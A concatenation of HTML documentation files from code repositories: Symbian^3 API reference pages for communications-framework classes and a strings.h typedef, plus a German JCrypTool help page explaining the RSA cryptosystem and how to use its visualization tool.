(CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2471677 id2472177 id2472182 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CommsFW::TCFBindCompleteMsg Class Reference </h1> <table class="signature"> <tr> <td> class CommsFW::TCFBindCompleteMsg : public CommsFW::TCFCommsMessageResult </td> </tr> </table> <div class="section"> <div> <p> Comms Bind Complete message. Sent from the CPM to the Rootserver in response to a <a href="GUID-ED0D73F9-A8A5-3EFC-AA30-521263DD2876.html#GUID-ED0D73F9-A8A5-3EFC-AA30-521263DD2876"> TCFBindMsg </a> message. Contains the completion code for the requested operation. <a href="GUID-ED0D73F9-A8A5-3EFC-AA30-521263DD2876.html#GUID-ED0D73F9-A8A5-3EFC-AA30-521263DD2876"> TCFBindMsg </a> </p> </div> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> CommsFW::TCFBindCompleteMsg <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-E1502048-F29E-3274-A860-8DE855AB6736.html"> CommsFW::TCFCommsMessageResult </a> <ul class="derivation"> <li class="derivation-depth-2 "> <a href="GUID-2B598FD4-C905-33B8-92B8-9C4B49ED7493.html"> CommsFW::TCFCommsMessageId </a> <ul class="derivation"> <li class="derivation-depth-3 "> <a href="GUID-3D353671-8EB8-3BF7-920A-237505EC3EF6.html"> CommsFW::TCFCommsMessage </a> <ul class="derivation"> <li class="derivation-depth-4 "> <a href="GUID-2F567827-EA35-3CFA-AB8D-DE9546BCD43C.html"> CommsFW::TCFMessage </a> <ul class="derivation"> <li class="derivation-depth-5 "> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> CommsFW::TCFMessageBase&lt; KCFMessageParamBlockSize &gt; </a> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Member Functions </th> </tr> </thead> <tbody> <tr> <td align="right" class="code"> </td> <td> <a href="#GUID-C0BE7D21-3444-334D-99AD-4D7780C692DF"> TCFBindCompleteMsg </a> ( TId , <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> ) </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-3D353671-8EB8-3BF7-920A-237505EC3EF6.html"> CommsFW::TCFCommsMessage::TCFCommsMessage(TCodes) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-2B598FD4-C905-33B8-92B8-9C4B49ED7493.html"> CommsFW::TCFCommsMessageId::Identifier()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-2B598FD4-C905-33B8-92B8-9C4B49ED7493.html"> CommsFW::TCFCommsMessageId::TCFCommsMessageId(TCFCommsMessage::TCodes,TId) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-E1502048-F29E-3274-A860-8DE855AB6736.html"> CommsFW::TCFCommsMessageResult::ReturnCode()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-E1502048-F29E-3274-A860-8DE855AB6736.html"> CommsFW::TCFCommsMessageResult::TCFCommsMessageResult(TCFCommsMessage::TCodes,TId,TInt) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-2F567827-EA35-3CFA-AB8D-DE9546BCD43C.html"> CommsFW::TCFMessage::TCFMessage() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-2F567827-EA35-3CFA-AB8D-DE9546BCD43C.html"> CommsFW::TCFMessage::TCFMessage(TCode,TInt,TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::Code()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::Code(TCode) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::IsPIGCode()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::MaxParamBlockSize() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::ParamBlock() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::ParamBlock()const </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::ParamBlock(TInt,TAny *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::RawBlock() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::RawBlock()const </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::RawBlock(TInt,const TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::SetPIGCode() </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::TCFMessageBase() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::TCFMessageBase(TCode,TInt,TAny *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;::TCFMessageBase(TInt,const TAny *) </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Enumerations </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-3D353671-8EB8-3BF7-920A-237505EC3EF6.html"> CommsFW::TCFCommsMessage:TCodes </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-2B598FD4-C905-33B8-92B8-9C4B49ED7493.html"> CommsFW::TCFCommsMessageId:@35 </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;:@30 </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-5BDC46ED-A497-36D3-9FAD-993907A389BD.html"> TCFMessageBase&lt; KCFMessageParamBlockSize &gt;:@31 </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Constructor &amp; Destructor Documentation </h1> <div class="nested1" id="GUID-C0BE7D21-3444-334D-99AD-4D7780C692DF"> <a name="GUID-C0BE7D21-3444-334D-99AD-4D7780C692DF"> <!-- --> </a> <h2 class="topictitle2"> TCFBindCompleteMsg(TId, TInt) </h2> <table class="signature"> <tr> <td> TCFBindCompleteMsg </td> <td> ( </td> <td> TId </td> <td> aIdentifier, </td> </tr> <tr> <td colspan="2"> </td> <td> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> </td> <td> aReturnCode </td> </tr> <tr> <td colspan="1"> </td> <td> ) </td> <td colspan="2"> [inline] </td> </tr> </table> <div class="section"> <div> <p> Constructor for bind complete comms message type. TId <a href="GUID-3D353671-8EB8-3BF7-920A-237505EC3EF6.html#GUID-D9D0A49D-943E-3055-B289-6F3E27E581AD"> TCodes </a> </p> </div> </div> <div class="section parameters"> <h3 class="sectiontitle"> Parameters </h3> <table border="0" class="parameters"> <tr> <td class="parameter"> TId aIdentifier </td> <td> Unique code identifying the specific message instance. </td> </tr> <tr class="bg"> <td class="parameter"> <a href="GUID-FC2F2B93-3D18-3BCC-9FD6-6BC6B240B667.html"> TInt </a> aReturnCode </td> <td> Code detailing whether the operation was a success or had some error. Can be one of the system wide error codes or one specific to the module. </td> </tr> </table> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
pdk/GUID-1908782C-36E5-3A44-9178-E9265E13D9B4.html
warlordh/fork_Symbian
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="copyright" content="(C) Copyright 2010"/> <meta name="DC.rights.owner" content="(C) Copyright 2010"/> <meta name="DC.Type" content="cxxFile"/> <meta name="DC.Title" content="strings.h"/> <meta name="DC.Format" content="XHTML"/> <meta name="DC.Identifier" content="GUID-1908782C-36E5-3A44-9178-E9265E13D9B4"/> <title>strings.h</title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api"/><link rel="stylesheet" type="text/css" href="cxxref.css"/></head> <body class="cxxref" id="GUID-1908782C-36E5-3A44-9178-E9265E13D9B4"><a name="GUID-1908782C-36E5-3A44-9178-E9265E13D9B4"><!-- --></a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()">Collapse all</a> <a id="index" href="index.html">Symbian^3 Product Developer Library</a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1">&#160;</div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2437088 id2437096 id2578593 id2653464 id2516678 id2631720 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"><a href="index.html" title="Symbian^3 Product Developer Library">Symbian^3 Product Developer Library</a> &gt;</div> <h1 class="topictitle1">strings.h File Reference</h1> <div class="nested1" id="GUID-BE25FFE1-646E-34EF-B1E7-CCAAB66666AF"><a name="GUID-BE25FFE1-646E-34EF-B1E7-CCAAB66666AF"><!-- --></a> <h2 class="topictitle2">Typedef size_t</h2> <table class="signature"><tr><td>typedef <a href="GUID-6B9FA9E3-BBBA-3B9F-8538-94583F2D3BA4.html">__size_t</a> </td><td>size_t</td></tr></table><div class="section"></div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once (CURRENT_SKIN_PATH.'/sdl_footer.html'); ?> </body> </html>
org.jcryptool.visual.rsa/nl/de/help/content/index.html
tassadarius/crypto
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>RSA-Verschlüsselung</title> <script src="${JCTJS_HOST}/javascript/jquery.js"></script> <script>TOC_generate_default("h2, h3")</script> </head> <body> <h1>RSA-Kryptosystem (verschlüsseln, entschlüsseln, signieren und verifizieren)</h1> <div class="TOC"></div> <hr /> <p>Diese Hilfe beschreibt zwei Punkte:<br/> <a href="#term">Das RSA-Schema</a><br/> <a href="#plugin">Benutzerinstruktionen für diese Visualisierung</a></p> <p> <b>Bitte beachten</b> Sie, dass diese Visualisierung die Operationen auf einzelnen Zeichen durchführt. In der Praxis werden die Operationen auf Zeichenblöcken oder der gesamten Nachricht durchgeführt. RSA wird normalerweise nicht verwendet, um große Datenmengen zu verschlüsseln, sondern um einen Sessionkey zu verschlüsseln (mit diesem werden dann die Daten mit einem symmetrischen Verfahren wie AES oder 3DES verschlüsselt) oder um einen Hashwert der Nachricht zu signieren.</p> <h2 id="term">Das RSA-Schema</h2> <p> Die bekannteste asymmetrische Verschlüsselung, die RSA-Verschlüsselung, wurde 1977 von Ronald Rivest, Adi Shamir und Leonard Adleman entwickelt. Die privaten und öffentlichen Schlüssel werden mit Hilfe von zwei zufälligen, großen Primzahlen, p und q, konstruiert, die vom Nutzer gewählt werden.</p> <p>Anschließend berechnet der Nutzer zwei natürliche Zahlen e und d, so dass (e*d) = 1 mod ((p-1)(q-1)). Das Produkt p*q = N und der Exponent e dienen dann als öffentlicher, und der Exponent d als privater Schlüssel. Die ursprünglich erzeugten Primzahlen p und q müssen geheim gehalten, oder besser gelöscht werden.</p> <p>Da dieser Verschlüsselungsalgorithmus nur auf ganzen Zahlen funktioniert, werden vor dem Verschlüsseln die Klartextzeichen in Zahlen konvertiert. Normalerweise wird dies mit Hilfe des ASCII-Codes durchgeführt. Es ist aber auch möglich, sich auf A=0, B=1, ...., Z=25 zu einigen.</p> <p>In dieser Visualisierung wird die ASCII-Code-Variante umgesetzt.</p> <p> Die Zahl jedes Klartextzeichens muss kleiner sein als das Produkt N. Warum das so ist, wird klar wenn man die Ver- und Entschlüsselungsfunktionen betrachtet (m = Zahlenwert des Klartextzeichen, c = Zahlenwert des Chiffratzeichen): c = m^e mod N und m = c^d mod N.</p> <p>Modulo-Rechnung bedeutet, den Rest einer Zahl modulo N zu berechnen. Wenn der Klartextzeichen-Wert m größer als N wäre, wäre nicht sicher gestellt, dass man in jedem Fall ein eindeutiges Geheimtextzeichen c erhält.</p> <p>Die Sicherheit des RSA Schemas basiert auf zwei mathematischen Problemen: Erstens ist es schwierig, für große Zahlen eine Wurzel modulo N zu berechnen (RSA-Problem). Zweitens ist die Faktorisierung von N = p*q schwierig, wenn die Faktoren ausreichend groß gewählt werden (RSA-Schlüsselproblem).</p> <h3 id="KeyGen">RSA-Schlüsselgenerierung</h3> <p> Eine besondere Charakteristik von Public-Key-Kryptosystemen wie RSA ist, dass umfangreiche Berechnungen nötig sind, um einen Schlüssel zu generieren. Erst danach kann die Ver- und Entschlüsselung durchgeführt werden.</p> <p>Als erstes werden die RSA-Parameter p, q, N und die Eulersche Zahl phi(N) mit Hilfe von zwei zufälligen Primzahlen p und q berechnet. Der sogenannte RSA-Modulus N wird als Produkt von p und q berechnet, N = p*q. Die Eulersche Zahl phi(N) ergibt sich als Produkt (p-1)*(q-1). Im Standardfall werden hiernach p und q gelöscht (somit kennt sie auch der Schlüsselerzeuger nicht mehr und braucht sie auch nicht geheim zu halten).</p> <p>Als zweiter Schritt wird der öffentliche Exponent e bestimmt. Mit dessen Hilfe, sowie phi(N), wird der private Exponent d berechnet. Der Exponent e wird wie folgt gewählt: 1 < e < phi(N), mit der Voraussetzung, dass e relativ prim zu phi(N) ist. Ein besonders beliebter Wert für e ist 2^16+1 = 65537. Diese Zahl ist meistens co-prim zu phi(N) und besonders gut für "square and multiply" Exponentiationen geeignet. Dies resultiert in sehr schnellen Operationen mit dem öffentlichen Schlüssel.</p> <p>Der private Exponent d = e^(-1) mod phi(N) wird als multiplikative Inverse des öffentlichen Exponenten e modulo phi(N) berechnet. Anders geschrieben: e*d = 1 mod ((p-1)(q-1)).</p> <p>Nach der Schlüsselerzeugung können N und e öffentlich gemacht werden. Anschließend kann jeder eine Nachricht für den Besitzer des zugehörigen privaten Schlüssels d verschlüsseln oder eine digitale Signatur überprüfen &nbsp;&ndash; einzig und allein durch die Verwendung des öffentlichen Schlüssels. </p> <h3 id="Enc">RSA-Ver- / Entschlüsselung</h3> <p> Um Daten mit RSA zu <b>verschlüsseln</b>, wird das Chiffrat mit Hilfe des öffentlichen Schlüssels e des Empfängers und des Klartexts berechnet. Die Verschlüsselungsfunktion ist c = m^e mod N. Das heißt, dass jeder eine Nachricht mit Hilfe des öffentlichen Schlüssels verschlüsseln kann. Allerdings kann nur der Besitzer des zugehörigen privaten Schlüssels d die Nachricht wieder entschlüsseln.</p> <p> Um ein Chiffrat mit RSA zu <b>entschlüsseln</b>, muss der private Schlüssel d bekannt sein. Die Entschlüsselungsfunktion, c^d = (m^e)^d = m^(e*d) = m mod N, berechnet den Klartext m.</p> <h3 id="Sig">RSA-Signatur / Verifizierung</h3> <p> Um eine Nachricht m mit RSA zu <b>signieren</b>, muss der private Schlüssel d bekannt sein. Die Signaturfunktion wird auf m oder auf einen Hashwert von m angewendet: m^d = sign(m) oder (hash(m))^d = sign(hash(m)). Dies erzeugt die Signatur.</p> <p> Um eine RSA-Signatur zu <b>verifizieren</b>, wird der öffentliche Schlüssel e des Signierers wie folgt verwendet: (sign(m))^e = m' oder (sign(hash(m)))^e = hash(m)'. Das Ergebnis der RSA-Exponentiation ist m' oder hash(m)' und muss mit der Nachricht m oder dem Hashwert der Nachricht hash(m), berechnet aus dem erhaltenen (und entschlüsselten) Dokument, verglichen werden. Wenn beide Werte identisch sind, wird dies als Beweis gesehen, dass der echte Besitzer des zugehörigen privaten Schlüssels d das Dokument signiert hat.</p> <h2 id="plugin">Benutzerinstruktionen für diese Visualisierung</h2> <p> Wenn die RSA-Visualisierung gestartet wird, kann man die gewünschte Operation (verschlüsseln, entschlüsseln, signieren oder verifizieren) auszuwählen &nbsp;&ndash; durch die Wahl des entsprechenden Tabs.</p> <p>Die Farbe der ersten drei Buttons links zeigt den aktuellen Status an. Rot bedeutet: Dieser Schritt wurde noch nicht bearbeitet. Ist ein Button grün, bedeutet das, diese Aktion ist erledigt. Wenn die ersten beiden Buttons grün sind, kann die Verschlüsselung schrittweise mit einem Klick auf <strong>Start</strong> gestartet oder direkt mit einem Klick auf <strong>Verschlüsseln</strong> abgeschlossen werden. Mit dem Button <strong>Zurücksetzen</strong> können Sie die Eingaben immer wieder neu durchführen.</p> <p> Zuerst müssen die benötigten RSA-Schlüssel ausgewählt werden. Klicken Sie auf den Button <strong>Schlüsselwahl</strong> auf der linken Seite. Man kann dann entweder ein neues Schlüsselpaar erzeugen oder ein gespeichertes Schlüsselpaar laden. Wenn der Verschlüsselungs- oder Verifizier-Tab ausgewählt ist, ist es außerdem möglich, nur einen öffentlichen Schlüssel zu erzeugen oder zu laden (denn für die Operationen Verschlüsselung und Verifizierung wird kein privater Schlüssel benötigt).</p> <p>Wenn Sie die Option <strong>Neues Schlüsselpaar</strong> wählen, kann man die Parameter p, q, und e entweder aus der Drop-down Liste wählen, oder eigene Werte eingeben (die Zahlen können beliebig groß sein, da JCT eine Langzahlarithmetik-Bibliothek benutzt). Wenn Sie den Schlüssel für eine spätere Verwendung speichern wollen, setzen Sie einen Haken bei der Checkbox <strong>Schlüsselpaar speichern</strong>.</p> <p>Die Option <strong>Bestehendes Schlüsselpaar</strong> lädt ein zuvor generiertes und gespeichertes Schlüsselpaar. Wählen Sie einen Schlüssel aus der Liste und geben Sie das entsprechende Passwort ein.</p> <p>Wenn der Verschlüsselungs- oder Verifizier-Tab ausgewählt wurde, ist es außerdem möglich, die Optionen <strong>Neuer öffentlicher Schlüssel</strong> und <Strong>Bestehender öffentlicher Schlüssel</Strong> auszuwählen. Die Option <strong>Neuer öffentlicher Schlüssel</strong> erlaubt die Eingabe von N und e, sowie die Option den Schlüssel zu speichern. Die Option <Strong>Bestehender öffentlicher Schlüssel</Strong> lädt einen zuvor gespeicherten öffentlichen Schlüssel.</p> <p>Wenn Sie auf <strong>Fertigstellen</strong> klicken, wird der gewählte Schlüssel automatisch übernommen und im Feld "Schlüssel" angezeigt (in Hexadezimal-Darstellung).</p> <p>Als Beispiel für die weitere Vorgehen wird die Bedienung im Tab <strong>Verschlüsseln</strong> beschrieben. Als nächstes klicken Sie auf den Button <strong>Text eingeben</strong> auf der linken Seite. Sie können Text mit ASCII-Zeichen eingeben. Jedes Zeichen wird nach Hex konvertiert und im Feld "Eingegebener Text" angezeigt. Wenn die Checkbox <strong>Zahlen direkt eingeben</strong> markiert ist, können Sie direkt Dezimalzahlen, separiert mit "SPACE" eingeben. Diese Zahlen werden zu ASCII-Zeichen konvertiert und im Feld "Eingegebener Text" angezeigt. Auf der nächsten Seite haben Sie die Möglichkeit, den eingegebenen Text automatisch formatieren zu lassen.</p> <p> Jetzt sind alle benötigten Informationen verfügbar und es ist möglich, die Operation zu starten. Wenn Sie nur das Ergebnis sehen möchten, klicken Sie auf den Button <strong>Verschlüsseln</strong> (unterhalb des Buttons <strong>Text eingeben</strong>). Wenn Sie stattdessen die Berechnung jeder Zahl einzeln sehen möchten, klicken Sie auf den <strong>Start</strong>-Button im Feld "Schrittweise Berechnungen". In beiden Fällen (schrittweise oder direkt durch alle Schritte) wird das endgültige Ergebnis im Feld "Ergebnis" angezeigt.</p> <p> Am unteren Rand der Maske können Sie verschiedene zusätzliche Optionen auswählen. Es besteht die Möglichkeit sich den Schlüssel und das Ergebnis entweder in Hex-, Binär- oder Dezimalwerten anzeigen zu lassen. Außerdem können Sie Werte von einem der drei anderen Tabs übernehmen und sich zusätzliche Informationen in Dialogen während der Operation anzeigen lassen.</p> <p>Weitere Informationen zum RSA-Kryptosystem finden sich z.B. unter:</p> <ul> <li><a href="PLUGINS_ROOT/org.jcryptool.visual.extendedrsa/$nl$/help/content/rsaHelp.html">JCT-Plugin: Erweitertes RSA-Kryptosystem (inklusive Identitäten und multi-primem RSA)</a> <li><a target="_blank" href="http://www.springer.com/de/book/9783662484234">Joachim von zur Gathen: CryptoSchool, Springer, 2015, Kapitel 3</a></li> <li><a target="_blank" href="http://www.springer.com/de/book/9783662484234">Johannes Buchmann: Einführung in die Kryptografie, Springer, 2010, Kapitel 8</a></li> <li><a target="_blank" href="http://de.wikipedia.org/wiki/RSA-Kryptosystem">Wikipedia: RSA</a></li> <li><a target="_blank" href="https://www.cryptool.org/images/ctp/documents/CT-Book-de.pdf">Das CrypTool-Buch, Kapitel 4</a></li> </ul> <br/> </body> </html>
sdk/GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D.html
warlordh/fork_Symbian
<?xml version='1.0' encoding='utf-8'?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xml:lang="en-us"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="copyright" content="(C) Copyright 2010" /> <meta name="DC.rights.owner" content="(C) Copyright 2010" /> <meta name="DC.Type" content="cxxClass" /> <meta name="DC.Title" content="CCommsDbAccess::CCommsDbAccessModemTable" /> <meta name="DC.Format" content="XHTML" /> <meta name="DC.Identifier" content="GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D" /> <title> CCommsDbAccess::CCommsDbAccessModemTable </title> <link type="text/css" rel="stylesheet" href="css/common.css" media="screen"/> <link type="text/css" rel="stylesheet" href="css/sdl.css" media="screen"/> <!--[if IE]> <link href="css/iefix.css" rel="stylesheet" type="text/css" media="screen" /> <![endif]--> <meta name="keywords" content="api" /> <link rel="stylesheet" type="text/css" href="cxxref.css" /> </head> <body class="cxxref" id="GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D"> <a name="GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D"> <!-- --> </a> <?php include_once (CURRENT_SKIN_PATH.'/sdl_header.html'); ?> <div id="sdl_container"> <div id="leftMenu"> <div id="expandcontractdiv"> <a id="collapseTree" href="javascript:tree.collapseAll()"> Collapse all </a> <a id="index" href="index.html"> Symbian^3 Application Developer Library </a> </div> <iframe style="border:none" height="800" width="300" src="index-toc.html"></iframe> <div id="treeDiv1"> &#160; </div> <script type="text/javascript"> var currentIconMode = 0; window.name="id2518338 id2518347 id2858858 id2678695 id2678984 id2679008 id2679073 "; YAHOO.util.Event.onDOMReady(buildTree, this,true); </script> </div> <div id="sdl_content"> <div class="breadcrumb"> <a href="index.html" title="Symbian^3 Application Developer Library"> Symbian^3 Application Developer Library </a> &gt; </div> <h1 class="topictitle1"> CCommsDbAccess::CCommsDbAccessModemTable Class Reference </h1> <table class="signature"> <tr> <td> class CCommsDbAccess::CCommsDbAccessModemTable : public CBase </td> </tr> </table> <div class="section"> <div> <div class="p"> Some specific function for agent exts <div class="note"> <span class="notetitle"> Note: </span> <p> The class <a href="GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D.html#GUID-9BDD84A1-FD80-3530-9965-72E70156BA2D"> CCommsDbAccess::CCommsDbAccessModemTable </a> * is a container of a database record and the session. The session is required to allow the caller to write back to the database. </p> </div> </div> </div> </div> <div class="section derivation"> <h2 class="sectiontitle"> Inherits from </h2> <ul class="derivation derivation-root"> <li class="derivation-depth-0 "> CCommsDbAccess::CCommsDbAccessModemTable <ul class="derivation"> <li class="derivation-depth-1 "> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase </a> </li> </ul> </li> </ul> </div> <div class="section member-index"> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Inherited Functions </th> </tr> </thead> <tbody> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::CBase() </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::Delete(CBase *) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::Extension_(TUint,TAny *&amp;,TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TAny *) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TLeave,TUint) </a> </td> </tr> <tr class="bg"> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::operator new(TUint,TUint) </a> </td> </tr> <tr> <td> </td> <td> <a href="GUID-8F6FE089-E2A8-30F4-B67E-10F286347681.html"> CBase::~CBase() </a> </td> </tr> </tbody> </table> <table border="0" class="member-index"> <thead> <tr> <th colspan="2"> Public Attributes </th> </tr> </thead> <tbody> <tr> <td align="right" valign="top"> <a href="GUID-D591EEF5-6DCB-3161-90C8-202B738D2894.html"> CCDRecordBase </a> * </td> <td> <a href="#GUID-29CF96F3-E88E-36C1-8AD7-7BDBA29F7DBD"> iRecord </a> </td> </tr> <tr class="bg"> <td align="right" valign="top"> <a href="GUID-4DB53486-95D5-3F59-B54C-19F52ABC6FC0.html"> CMDBSession </a> * </td> <td> <a href="#GUID-0609B9BD-C7FC-39C8-8640-1C348F65B0B9"> iSession </a> </td> </tr> </tbody> </table> </div> <h1 class="pageHeading topictitle1"> Member Data Documentation </h1> <div class="nested1" id="GUID-29CF96F3-E88E-36C1-8AD7-7BDBA29F7DBD"> <a name="GUID-29CF96F3-E88E-36C1-8AD7-7BDBA29F7DBD"> <!-- --> </a> <h2 class="topictitle2"> CCDRecordBase * iRecord </h2> <table class="signature"> <tr> <td> <a href="GUID-D591EEF5-6DCB-3161-90C8-202B738D2894.html"> CCDRecordBase </a> * </td> <td> iRecord </td> </tr> </table> <div class="section"> </div> </div> <div class="nested1" id="GUID-0609B9BD-C7FC-39C8-8640-1C348F65B0B9"> <a name="GUID-0609B9BD-C7FC-39C8-8640-1C348F65B0B9"> <!-- --> </a> <h2 class="topictitle2"> CMDBSession * iSession </h2> <table class="signature"> <tr> <td> <a href="GUID-4DB53486-95D5-3F59-B54C-19F52ABC6FC0.html"> CMDBSession </a> * </td> <td> iSession </td> </tr> </table> <div class="section"> </div> </div> <p class="copyright">Copyright &#169;2010 Nokia Corporation and/or its subsidiary(-ies).<br /> All rights reserved. Unless otherwise stated, these materials are provided under the terms of the <a href=" http://www.eclipse.org/legal/epl-v10.html"> Eclipse Public License v1.0</a>.</p> </div> </div> <?php include_once 